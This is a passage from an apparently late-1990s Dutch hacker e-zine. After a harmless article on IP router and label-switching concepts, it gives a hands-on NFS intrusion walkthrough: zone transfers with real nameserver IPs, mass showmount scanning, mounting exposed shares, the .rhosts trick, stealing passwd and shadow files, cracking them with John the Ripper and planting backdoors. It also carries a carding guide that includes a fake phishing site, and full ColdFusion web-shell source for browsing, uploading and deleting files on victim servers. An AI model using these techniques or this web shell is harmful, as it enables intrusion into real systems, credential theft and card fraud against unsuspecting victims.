hiërarchisch zijn opgebouwd.
Berijkbaarheidsinformatie van verschillende routers kan hierdoor worden
samengevoegd, waardoor de route-tabellen in omvang kunnen worden be-
perkt. Desalniettemin bevatten route-tabellen van routers in de back-
bone-netwerken van het internet momenteel zo'n 40.000 entries. Door
groei in de toekomst, zal de problematiek rond het routeren en forwar-
den alleen maar nijpender worden.
Naast routerings- en forwardingsprocessen kunnen routers ook nog
andere, optionele processen uitvoeren. We noemen hier bijvoorbeeld het
controleren van toegangslijnen t.b.v. netwerkbeveiliging, het uitvoeren
van verschillende bufferingsschema's t.b.v. kwaliteitsdifferentiatie en
het genereren van administratieve gegevens voor het accounting- en bil-
lingproces.
Traditionele IP-routers
Om zijn taken te kunnen uitvoeren is een IP-router opgebouwd uit drie
functionele componeneten: een interfacekaart, die de fysieke koppeling
naar de transportlaag tot stand brengt, een route-server, die voor elk
binnenkomend IP-datagram beslist welke uitgaande interface moet worden
gekozen, en een switching-device, die de IP-datagrammen vanaf het punt
van binnenkomst naar de juiste uitgaande interface schakelt.
Bij traditionele routers liggen de beperkingen op het gebied van for-
warding voornamelijk bij de route-server. Deze is volledig in software
geïmplementeerd. De keuze voor softwarematige implementatie brengt
automatisch beperkingen op het gebied van snelheid met zich mee.
Voor ieder binnenkomend IP-datagram moet de route-server namelijk in
zijn routetabel een entry opzoeken die correspondeert met het IP-be-
stemmingsadres. Voor elk binnenkomend IP-datagram op elke interface
moet dat opnieuw gebeuren. Uiteraard is het een verhoudingsgewijs zeer
tijdrovende zaak. Hoe tijdrovend hangt af van de snelheid van de ge-
bruikte processor en van de omvang avn de route-tabel. De verwerkings-
snelheid van het aantal IP-datagrammen vormt ook de beperking van een
traditionele router. De maximale verwerkingssnelheid ligt momenteel op
ongeveer een half miljoen zoekacties per seconde.
Deze verwerkingssnelheid is voor veel van de huidige IP-netwerken
voldoende, maar schiet naar verwachting in de toekomst te kort. In
ieder geval geldt dat wanneer wordt vastgehouden aan de traditionele
implementatiemethoden, er op korte termijn geen belangrijke verbe-
teringen in de verwerkingssnelheid van IP-routers kunnen worden ver-
wacht. Daarom is er momenteel een aantal nieuwe concepten voor IP-ne-
werken in ontwikkeling, in te delen in drie klassen: de hoge snelheid-
schakelconcept, de IP-labelschakelconcept en de adres-resolutieconcep-
ten.
De IP-routerconcepten
Hoge snelheid IP-routers zijn zeer snelle opvolgers van traditionele
IP-routers. Bij het ontwerpen van hoge snelheid routers vormt de ver-
werkingssnelheid van IP-datagrammen een fundamenteel ontwerpcriterium.
Kijken we naar de functionaliteit, dan is er geen verschil.
Naar de 'buitenwereld' hanteren zij dezelfde IP-protocollen. Het voor-
deel van deze oplossing is derhalve dat bestaande netwerkontwerpen
gehandhaafd kunnen blijven.
De hoge snelheid IP-routers worden in twee typen onderscheiden, die
beide al commerciëel verkrijgbaar zijn: de zogenaamde laag-3 schake-
laars en multigigabit routers.
LAAG-3 SCHAKELAARS
De ontwerper van een laag-3 schakelaar kan uit een aantal technieken
kiezen im het forwardingsproces door de router te versnellen. Zo kan
het opzoeken van de routers in de route-tabel hardwarematig in plaats
van softwarematig worden uitgevoerd. Dit komt de verwerkingssnelheid
ten goede. Ook kan op elke interfacekaart een aparte processor worden
geïmplementeerd voor het uitvoeren van het forwarding-proces. Er zijn
nog meer mogelijkheden. Toepassing van deze oplossing kan resulteren
in een verwerkingssnelheid die tot enkele miljoenen IP-datagrammen per
seconde kan oplopen.
MULTIGIGABIT ROUTERS
Multigigabit routers lijken in veel aspecten op laag-3 schakelaars. Een
verschil is echter dat laatstgenoemde uitgevoerd is met een gedeelde
bus als switching device, terwijl eerstgenoemde over een volledige
schakelmatrix beschikt, die geïmplimenteerd is in de IP-router.
De IP-schakelconcepten
Bij de IP label-schakelconcepten bevatten de IP-routers tevens label-
schakelfaciliteiten en worden daarom ook wel aangeduid als label-
switches. Alhoewel in dit artikel wordt uitgegaan van ATM-schakel-
faciliteiten, zijn de concepten ook van toepassing op andere label-
schakel technieken, zoals Frame Relay. In die delen van IP-netwerken
waarin labelswitches zijn toegepast, kunnen traditionele IP-paden door
ATM-verbindingen worden kortgesloten.
Vervolgens kunnen IP-routers aan de rand van het IP-label-schakelnet-
werk de binnenkomende IP-datagrammen toewijzen aan een ATM-verbinding.
De datagrammen worden daarna op ATM-niveau door de kern van het netwerk
getransporteerd zonder dat daarbij op tussenliggende punten IP-forwar-
ding plaatsvindt. Het uitvoeren van het IP-forwardingproces in de kern
van het netwerk wordt hiermee kortgesloten en teruggebracht tot het
schakelen van ATM-cellen. Zoals eerder is betoogd kan dit schakelen van
ATM-cellen met hoge snelheid gebeuren.
Binnen de IP label-schakel concepten spelen momenteel twee technieken
een hoofdrol: de flow-gebaseerde en de topologie-gebaseerde label-scha-
keltechnieken. De technieken onderscheiden zich in de manier waarop de
label-switches ATM-verbindingen definiëren en vervolgens binnenkomende
IP-datagrammen toewijzen aan deze ATM-verbindingen.
FLOW-GEBASEERDE LABEL-SCHAKEL TECHNIEKEN
Bij deze technieken worden ATM-verbindingen opgezet door individuele,
'grote' IP-stromen.
IP-switching is momenteel de bekendste flow-gebaseerde label-schakel-
techniek. Bij deze techniek worden door de IP-switches individuele
'grote' IP-stromen gedetecteerd. Voor zo'n stroom wordt vervolgens een
ATM-verbinding opgezet door het toekennen van een label.
Door middel van voor IP-switching specifieke signaleringsprotocollen
maakt de IP-switch dit aan de aangrenzende IP-switches kenbaar. Deze
kunnen op hun beurt de IP-stroom op basis van de aangemelde VPI/VCI-
combinatie als ATM-verbinding doorschakelen. Met dit 'doorgeef'-effect
wordt van begin tot eind een aparte ATM-verbinding gerealiseerd voor
iedere gedetecteerde IP-stroom. Er wordt geclaimed dat ongeveer 80% van
het IP-verkeer in grote IP-netwerken wordt herkend als behorende tot
zo'n 'grote' IP-stroom. Verkeer dat niet als 'grote' IP-stroom wordt
herkend, wordt door de IP-switches op de traditionele wijze behandeld
en op basis van IP-forwarding door het netwerk getransporteerd. Het
IP-switching protocol is door de Internet Engineering Task Force (IETF)
gestandaardiseerd en IP-switching produkten zijn al commercieel ver-
krijgbaar.
TOPOLOGIE-GEBASEERDE LABEL-SCHAKEL TECHNIEKEN
Bij deze technieken worden vooraf ATM-verbindingen geconfigureerd, die
de verschillende routes door het IP-netwerk representeren. Tag-switch-
ing is een veelbesproken techniek die onder andere topologie-gebaseerde
label-schakelen ondersteunt. Hierbij zal tussen elke eerste en laatste
tag-switch van het netwerk een ATM-verbinding gerealiseerd worden. Dit
gebeurt vooraf, ongeacht of en wanneer IP-datagrammen tussen deze
locaties zullen worden verzonden. Ieder binnenkomend IP-datagram wordt
aan de rand van het tag-switching netwerk aan de juiste, reeds be-
staande ATM-verbinding toegewezen. Het datagram wordt vervolgens door
het netwerk vervoerd zonder dat een tussenliggende tag-switch nog IP-
forwarding plaatsvindt. In vergelijking met het continue, flow-geba-
seerde opzetten van ATM-verbindingen, kan het vooraf, topologie-geba-
seerde opzetten van ATM-verbindingen het aantal benodigde ATM-verbin-
dingen beperken en de druk verlichten die het opzetten van ATM-verbin-
dingen op het netwerk legt. Tag-switching bevindt zich momenteel in het
IETF-standaardisatieproces. De eerste tag-switching produkten werden
aan het einde van 1997 op de markt gebracht.
(Bron: Vakidioot van Universiteit Utrecht April 1999)
naam: Maniac
email: 0holster01@flnet.nl
homepage:
www.flnet.nl/~0holster01
--------------------
09. NFS server scan
--------------------
NFS server scan. -updatet 12-4-99 for H4H-
Methode is in andere vorm ook toepasbaar op andere mountable spullen.
-kwestie van verbeelding-
by Nikkita
special thnx to: Mata_Hari, C00lvibes, Hardbeat, Ossie & Na‹ef
Document mag vrijelijk verspreid worden mits je naam en bron maar vermeldt.
Geschreven voor NHM'98 -t.b.v. demonstratie-
Ik heb document upgedate omdat het mij irriteerde dat bewerken van grote
tabellen hier niet goed in beschreven was.
Onder Unix en zeker Linux is het heel gemakkelijk om grote tabellen te
bewerken, in vorige versie van document heb ik dat niet uitgezocht omdat
ik zat met een grote tijdsdruk -i.v.m. organiseren van NHM- hierdoor heb
ik snel een document in elkaar gerost die voornamelijk uit cut & paste
bestond, in Linux en de functies en script mogelijkheden heb ik me toen
niet in verdiept, nu dat we een paar maanden verder zijn heb ik e.a. bij
geleerd en kan je nu vertellen hoe je -voor welk doel dan ook- grote
tabellen kunt bewerken, en dat dit snel & beter gaat dan onder Windows
-Excel b.v.- zul je merken/gemerkt hebben als je .de of .nl domein
probeert te bewerken, en er achterkomt dat Windows wel erg slecht tegen
bestand kan die meer dan 65K aan rijen heeft :)
Ook zal vanaf nu dit document een standaard stuk worden voor alles wat ik
hierna nog schrijf, ik zal in de toekomst verwijzen naar dit document,
zodat vragen over hoe je bestanden moet bewerken onder Linux overbodig
worden.
Ingredi‰nten:
Linux/Unix shell
Authoritive DNS server -die je toestaat queries te draaien-
NSLOOKUP
Doel:
Shell vinden en indien nodig/mogelijk Root Hacken
Nu zijn de bovenstaande redenen niet echt mijn bedoelingen, omdat iemand
die enige Unix/Linux kennis heeft dit gehele document zelf wel had kunnen
bedenken..
Met dit document probeer ik te bereiken dat mensen gaan inzien dat je door
combineren van verschillende methodes, tools en met een beetje scripten je
een heel eind kan komen. Het gaat er met name om dat je inzicht hebt, des
te ruimer je blik op de verschillende mogelijkheden van diverse Os'en des
te meer mogelijkheden er zijn.
Het begin:
Om een NFS volume te vinden moet je erg veel IP -systemen- controleren
(scannen), omdat je niet gaat zoeken op ip's die er niet zijn etc..etc..
lees je een DNS uit, een DNS is niks anders dan een DATABASE waarin alle
namen met IP in staan. In een vervolg document zal ik een pingtest in
perl beschrijven zodat je ze eerst IP's kan pingen om te zien of ze echt
online zijn alvorens een scan -wat voor scan dan ook- uit te voeren, met
name wutest wil wel eens in een wachtlus blijven hangen als IP down blijkt
te zijn.
Als jij ergens een DNS invult dan vraagt hij aan een DNS server naar
de bijbehorende IP en kan hij er heen.
Je kunt nu -onder Linux- op 2 manieren lijsten genereren:
HOST
NSLOOKUP
Mijn persoonlijke voorkeur gaat uit naar NSLOOKUP omdat je dan zeer gemak-
kelijk van nameserver kan wisselen, immers de ene nameserver is de andere
niet -restricties e.d.- , ook kom je soms een nameserver tegen binnen een
domein, het kan soms wenselijk zijn om deze uit te lezen om zo machines
binnen het domein te vinden, die misschien niet op de externe nameserver
terug te vinden zijn.
Afgezien van bovenstaande kun je met HOST zeer gemakkelijk lijsten
genereren die makkelijker te verwerken zijn.
Hieronder een voorbeeld met NSLOOKUP:
$ nslookup ; heb je ook onder WindowsNT
Default Server: ns.xxxxxx.net ; mijn isp niet :)
Address: 195.256.9.18
> set q=ns ; query naar nameservers
> pl ; PL domein = Polen
Server: ns.xxxxxx.net
Address: 195.256.9.18
Non-authoritative answer: ; servers waar je niks aan hebt
pl nameserver = SUNIC.SUNET.SE
pl nameserver = NMS.CYFRONET.KRAKOW.pl
pl nameserver = DNS2.TPSA.pl
pl nameserver = BILBO.NASK.ORG.pl
pl nameserver = COCOS.FUW.EDU.pl
Authoritative answers can be found from: ; servers die je kan gebruiken
SUNIC.SUNET.SE internet address = 192.36.125.2
NMS.CYFRONET.KRAKOW.pl internet address = 149.156.2.101
NMS.CYFRONET.KRAKOW.pl internet address = 149.156.1.3
DNS2.TPSA.pl internet address = 194.204.152.34
BILBO.NASK.ORG.pl internet address = 148.81.16.51
COCOS.FUW.EDU.pl internet address = 148.81.4.6
> server 148.81.4.6 ; verander van DNS server
Default Server: cocos.fuw.edu.pl
Address: 148.81.4.6
> ls -d pl > pl ; gooi alle op .pl eindigende DNS entries naar bestand pl
[cocos.fuw.edu.pl]
##########################################################################
######
##########################################################################
######
##########################################################################
######
################
Received 12802 records.
En klaar is kees, als je de bestand pl bekijkt zul je zien dat het een
bende is waar je nog niks meekan,
cat foo| awk '{ print $3 }'| grep -v [a-z]| awk ' BEGIN {i=0} { i=i+1;
print "showmount -e " $nf " &" } END {print "Done! Ik heb " i " regels
voor jouw plezier gedaan :-)"}' > foo |tail -f foo
HOST is erg gemakkelijk te gebruiken, helemaal als je meerdere dingen wilt
uitvoeren met output van HOST.
Kijk ook eens naar HOST -l -v -t any rutgers.edu -of whatever- je krijgt
een lijst met alle nameserver info, met name TXT en HWINFO kunnen erg han-
dig uitkomen.
Maar voor onze doel doen we HOST -l foo
host -l foo| cut -d " " -f4|sort|uniq|awk ' BEGIN {i=0} { i=i+1; print
"showmount -e " $nf " &" } END {print "Done! Ik heb " i " regels voor jouw
plezier gedaan :-)"}' > foo |tail -f foo
of
for d in `host -l foo |cut -d " " -f4| sort -u| grep -v [a-z] ` ; do echo
showmount $d '&' ; done > foo
BTW: Showmount moet je al root uitvoeren, en als hij er nog niet opstaat
moet je eerst nfs installeren.
doe een chmod +x foo script executable te maken
en voer hem als volgt uit ./pl.txt > outputnfs -or whatever-
Nu zul je erg veel foutmelding e.d. voor bij zien schieten -portmap errors
etc..etc..- niet op letten.
Zodra hij klaar is zal je in die outpunfs file waarin dingen zoals -hij
loopt niet meer effe 1 keer op enter drukken-
$ cat ploutput |less
Export list for 195.116.109.137:
/cdrom 192.124.116.5
Export list for 195.116.161.163:
/ backlix.merinosoft.com.pl
Export list for 195.116.161.163:
/ backlix.merinosoft.com.pl
Export list for 195.117.175.126
/vol/ftp/pub (everyone)
/usr/local/samba (everyone)
/cdrom (everyone)
/slakware (everyone)
waarna je moet zoeken naar everyone's en mountpoints als / of /home
# mount 195.117.175.126:/usr/local/samba /mnt
# cd /mnt
# ls
bin lib private var
Je kunt zodra je een mountpoint hebt meerdere dingen doen afhankelijk of
je ook schrijfrechten kun je iets wel of niet, overigens wil het helemaal
niet zeggen dat je perse schrijfrechten nodig hebt.
Hier onder enkele voorbeelden van wat je kan doen
Met dank aan Hardbeat:
De voorwaardes van echo + + > .rhosts truc.
in.rshd of in.rlogind (TCP poort 514/513) moet openstaan
soms moet de host waar je vandaan komt ook in /etc/hosts.equiv staan
en hosts.allow/deny moeten niet in de wegzitten daar komt bij dat een + +
in root's .rhosts in de nieuwere versies van de daemons gewoon genegeerd
wordt, vaak met melding in syslog beter is dan echte parameters op te
geven, die minder verdacht lijken fijnste is als je al shell xs hebt op de
bak, als gewone user dan kun je die met localhost in de .rhosts gooien
localhost staat ook vaak al in /etc/hosts.equiv :)
Voorbeeld uit praktijkervaring:
toegang op een server was al verkregen door:
- lek cgiscriptje (user nobody)
- bekend ftpwachtwoord (normale user)
echter geen shellxs als die user ftp zat van buitenaf dicht via 't
cgitje met een stukje vernuftige shellcode+telnet een .rhosts geupload en
dan vanuit 't cgitje rsh localhost blah blah blah doen oftewel, shellxs
als de user (kwestie van analytisch vermogen :)
Overigens is NFS+ .rhosts combinatie integenstelling wat je zou verwachten
best wel intressant.
Voordat je het weet heb je een nameserver van KPN te pakken, maar in andere
gevallen gaat het veelal om verkeerd geconfigureerde exports, en is het op
zijn plaats om beheerder effe te mailen en te waarschuwen.
Indien hij niets er aan doet kun je actie ondernemen, en als hij dan nog
niks dicht timmert.........tja..... :)
Wat je ook kunt doen is op de meest basic manier te werk gaan
Je gaat opzoek naar passwd & shadow of andere dingen waarin je password
kunt vinden,
[root@XXXXX /mnt]# cd private
[root@gXXXXX private]# ls
private smbpasswd smbpasswd~
[root@XXXXX private]#
of NFS (mountd)-exploits runnen, en je hebt -als je geluk hebt root.-
Met onderstaande commando's kun je indien je ergens root mount vind de
password bestanden vinden.
$ ls / -R |grep passwd
$ ls / -R |grep shadow
Met een portscan of telnet kun je zien of de door jouw gehackte machine
telnet heeft.
accountvaniemand::0:0::/:/bin/sh indien zoiets in passwd file staat heb je
er alleen iets hebt als je de shadow
file ook hebt, standaard heet hij shadow en staan beide bestanden in /etc/
maar dit hoeft niet zo te zijn.
accountvaniemand:DwqFDdwSSRewFa:0:0::/:/bin/sh indien hij er zo uit ziet
dan heb je een unshadowed of een fakepassword file te pakken.
Cracken van passwords:
Ga naar astalavista.box.sk en zoek naar John The Ripper download dat
proggie.
draai unshadow passwd shadow > unshadowed ; ook indien je een gedeelte van
shadow hebt (door coredump of exploit) zal unshadowd crypted passwords bij
de juiste accounts zetten.
john -single unshadowed en je zal wat passwords krijgen
john zonder parameter geeft de opties op die meer passwords kunnen
opleveren, lees ook de meegeleverde documentatie.
Zodra je wat accounts met password hebt kun je een portscan of telnet zien
of de door jouw gehackte machine telnet heeft.
Indien je volledige controle over een machine hebt -root shell b.v.- wees
dan sportief en mail de beheerder dan,
ze zullen dan wel het systeem dicht gooien, maar als je het goed hebt
gedaan heb je er achterdeurtjes in laten zitten. :)
Suc6
Gerrie
The Happy Prutser
http://www.hit2000.org
BTW: ik raad iedereen om eens een stukje te schrijven, je komt dan aan
dingen toe die je normaal gesproken links zou liggen, in totaal heeft de
bewerk functies mij 4 a 5 uurtjes gekost maar dat was het beslist waard,
nu ken ik tenminste de kracht van awk, cut & grep waarderen en toepassen!
En de tijdwinst heb je in no time terug verdiend
Je leert dus altijd door te prutsen :)
------------
10. Carding
------------
(Redactie: Deze info is alleen omdat sommige mensen wilden weten wat
carding inhield. Carding is bij de wet verboden. Wat je met deze in-
formatie doet is geheel voor je eigen verantwoordelijkheid. Tevens
wordt dit gedaan door zogenaamde carders en heeft het niks met hack-
en te maken)
Een mooie hobbie, die door een aantal mensen beoefend word, is het zo-
geheten'carding'
Nou hoef ik jullie geheid niet meer uit te liggen wat het ben, (doe ik
toch), maar het is dus dat je met iemand anders zijn Creditcard (of
eentje die je zelf gegenerated hebt maar dat lukt toch nooit) allemaal
mooie spulletjes besteld, toegang krijgt tot sexsites, enzovoorts enzo-
voorts.
Het idee is dus heel simpel:
1. zorg dat je een kaart krijgt
2. zoek een site waar je iets kan bestellen en bestel dat
Nou, dat klinkt makkelijk he?
Maar ja, het valt dus een klein beetje tegen (damn!) . . .
Hoe kom je bijvoorbeeld aan en creditcard nummer? Nou, de mensen die
net zo goed zijn als Zero Cool kunnen natuurlijk gewoon bij de credit-
card maatschappij inbreken, maar dit was toch iets meer bedoeld voor
echte mensjes...
Je kan natuurlijk een (zo duur mogelijk) restaurant gaan zoeken, en
tussen de ofval naar bonnetjes gaan zoeken als je daar zin in hebt(of
er gaan werken haha), maar er zijn ook manieren waarbij je niet je ver-
touwde zolderkamertje hoeft te verlaten en waarbij je niet vies wordt.
(of moe) Zo kan je bv in nieuwsgroepen als alt.2600.cardz op zoek gaan
naar mensen die je een paar nummertjes+info willen verkopen (zo'n 50
dollar per stuk geloof ik), of zelf iets moois bedenken. Een voorbeeld-
je van dt laatste las ik laatst ergens:
Een gozer had een sex site gemaakt, zag er heel gelikt uit enzow, en
die gaf dan gratis memberships weg aan de eerste 100 leden(of zoiets).
Nou, er waren mensen die dat wel leek, die vulden netjes hun info in,
kregen een server error, en dachten 'shit'. Je kan zelf wel bedenken
wat er met de ingevulde info gebeurd is . . . .
Nou, ik wil jullie creatieve geest niet verspillen met voorgekauwde
ideeen, dus voel vrij om zelf ook iets te bedenken . . .
Nou, dan kom ik volgende keer met deel twee: Waar sturen we het heen?
(alvast een tipje van de sluier: niet naar je eigen huis)
bron: vooral alt.2600.cardz, en wat ik me zo vaag herinner uit een
phrack (http://www.phrack.com)
Avatar
email: xxx-password@usa.net
ICQ#: 23578830
----------------------------
11. Aanvulling Cold Fusion
----------------------------
Aangezien veel mensen nog niet helemaal door hebben hoe Cold Fusion
hier nog een aantal opmerkingen. Bij het uploaden van mole.cfm wil
Cold Fusion wel eens een andere naam geven aan mole.cfm. Deze naam
is dan te zien aan het eind van de URL die dan in beeld komt.
Gebruik dan deze naam in plaats van mole.cfm om de harde schijf te
bekijken. Ik ben namelijk een server tegengekomen waar ik wel 30x
mole.cfm onder een andere naam ben tegengekomen. En zo wordt het
een beetje een zooitje en dat willen we natuurlijk niet.
Tevens heeft drgenius speciaal voor H4H mole.cfm zodanig aangepast
dat je nu ook directories kunt maken en verwijderen. Hiervoor moet
je wel twee extra bestanden uploaden, maar dat moet geen probleem
zijn. Je hebt nu de bestanden mole2.cfm, rd.cfm en md.cfm. Alles
werkt gewoon via de mole2.cfm. Om een directory te maken moet je het
hele pad intikken. Bijvoorbeeld: c:\inetpub\scripts\asby.
Mole2.cfm:
<CFPARAM NAME="DirPath" DEFAULT="#GetTempDirectory()#">
<CFSET THISTEMPLATE=GETFILEFROMPATH(GETTEMPLATEPATH())>
<CFIF LISTLAST("#DirPath#","\") IS ".">
<CFSET DIRPATH=GETDIRECTORYFROMPATH(DIRPATH)>
<CFELSEIF LISTLAST("#DirPath#","\") IS "..">
<CFSET DIRPATH=GETDIRECTORYFROMPATH(LEFT("#GetDirectoryFromPath
(DirPath)#",LEN(GETDIRECTORYFROMPATH(DIRPATH))-1))>
</CFIF>
<CFIF ISDEFINED("uploadfile")>
<CFIF LEN(UPLOADFILE) GT 0>
<CFFILE ACTION="UPLOAD"
FILEFIELD="uploadfile"
DESTINATION="#DirPath#"
NAMECONFLICT="OVERWRITE">
File uploaded<BR><BR>
</CFIF>
</CFIF>
<CFIF ISDEFINED("deletefile")>
<CFSET DELETEFILE=DIRPATH&DELETEFILE>
<CFIF FILEEXISTS(DELETEFILE)>
<CFFILE ACTION="DELETE"
FILE="#deletefile#">
File deleted<BR><BR>
</CFIF>
</CFIF>
<CFIF GETFILEFROMPATH(DIRPATH) IS "" OR GETFILEFROMPATH(DIRPATH) IS ".">
<CFDIRECTORY DIRECTORY="#DirPath#"
NAME=DIRDETAILS
SORT="name ASC">
<CFOUTPUT>
<FONT SIZE="+2">#DirPath#</FONT><BR>
</CFOUTPUT>
<TABLE>
<TR>
<TD></TD>
<TD>Name</TD>
<TD ALIGN="right">Size</TD>
<TD>Modified date</TD>
</TR>
<CFOUTPUT QUERY="DirDetails">
<CFSET NEWPATH = URLENCODEDFORMAT(DIRPATH&NAME)>
<CFIF TYPE IS "Dir" AND NAME IS NOT "." AND NAME IS NOT "..">
<CFSET NEWPATH=NEWPATH&"\">
</CFIF>
<TR>
<TD>[#Type#]</TD>
<TD><A HREF="#ThisTemplate#?DirPath=#NewPath#">#Name#</A></TD>
<TD ALIGN="right">#Size#</TD>
<TD>#DateLastModified#</TD>
<CFIF TYPE IS "File">
<FORM ACTION="#ThisTemplate#?DirPath=#GetDirectoryFromPath
(DirPath)#&deletefile=#URLEncodedFormat(Name)#" METHOD="post">
<TD><INPUT TYPE="submit" VALUE="Delete"></TD>
</FORM>
</CFIF>
</TR>
</CFOUTPUT>
</TABLE>
<CFOUTPUT>
<FORM ACTION="#ThisTemplate#?DirPath=#URLEncodedFormat
(DirPath)#" ENCTYPE="multipart/form-data" METHOD=POST>
<INPUT TYPE="File" NAME="uploadfile" SIZE="30"><BR>
<INPUT TYPE="submit" VALUE=" Upload ">
</FORM>
</CFOUTPUT>
<FORM ACTION="md.cfm" METHOD="post">
<INPUT TYPE="text" SIZE="30" NAME="CreateDir"><br>
<INPUT TYPE="submit" VALUE="Create Directory"></FORM>
<FORM ACTION="rd.cfm" METHOD="post">
<INPUT TYPE="text" SIZE="30" NAME="DeleteDir"><br>
<INPUT TYPE="submit" VALUE="Delete Directory"></FORM>
<CFELSE>
<CFFILE ACTION="Read"
FILE="#DirPath#"
VARIABLE="var_name">
<CFCONTENT TYPE="unknown:security.breach" FILE="#DirPath#" DELETEFILE="No">
</CFIF>
Rd.cfm:
<CFDIRECTORY ACTION="Delete" DIRECTORY="#Form.DeleteDir#"
MODE="permission" SORT="name ASC">
<cfoutput>
<h2>#Form.Deletedir#</h2> deleted
</cfoutput>
Md.cfm:
<CFDIRECTORY ACTION="Create" DIRECTORY="#Form.CreateDir#"
MODE="permission" SORT="name ASC">
<cfoutput>
<h2>#Form.Createdir#</h2> created
</cfoutput>
Asby(post@hackers4hackers.org)
---------------------
12. Ditjes en datjes
---------------------
Stoplichten deel 2
Op mijn vraag uit H4H deel 1 is het volgende uitgerold:
- Stoplichten zitten niet op een landelijk netwerk
- Meeste stoplichten worden per kruispunt geregeld
- Echter in sommige steden kan de brandweer de stoplichten op
afstand regelen. Dus er bestaan wel kleine netwerken van
stoplichten.
Er waren ook een paar mensen die me vertelden dat sommige bussen
met een apparaatje de stoplichten op groen konden zetten.
Dit lijkt mij onwaarschijnlijk, maar wie weet hier meer over? En
wie weet er meer over de kleine netwerken van stoplichten, die de
brandweer op afstand kan bedienen?
Asby (post@hackers4hackers.org)
Wij willen op onze site een links lijst maken met allerlei
interessante links. Hiervoor hebben wij dus ook interessante links
voor nodig. Dus stuur je bookmarks op naar ons, zodat wij een mooie
lijst kunnen maken. Verdeel aub wel de bookmarks in groepen en gooi
ze niet dwars door elkaar, want dan moeten wij dit allemaal weer
uitzoeken. Zet er ook bij wat er te zien is op de pagina en waarom
ie interessant is. Bookmarks moeten wel allemaal verwijzen naar
technische sites. En alsjeblieft geen warez-sites...
Zo kunnen jullie, als jullie allemaal meewerken natuurlijk, later
makkelijk en snel de site zoeken waarover je informatie zoekt.
Asby (post@hackers4hackers.org)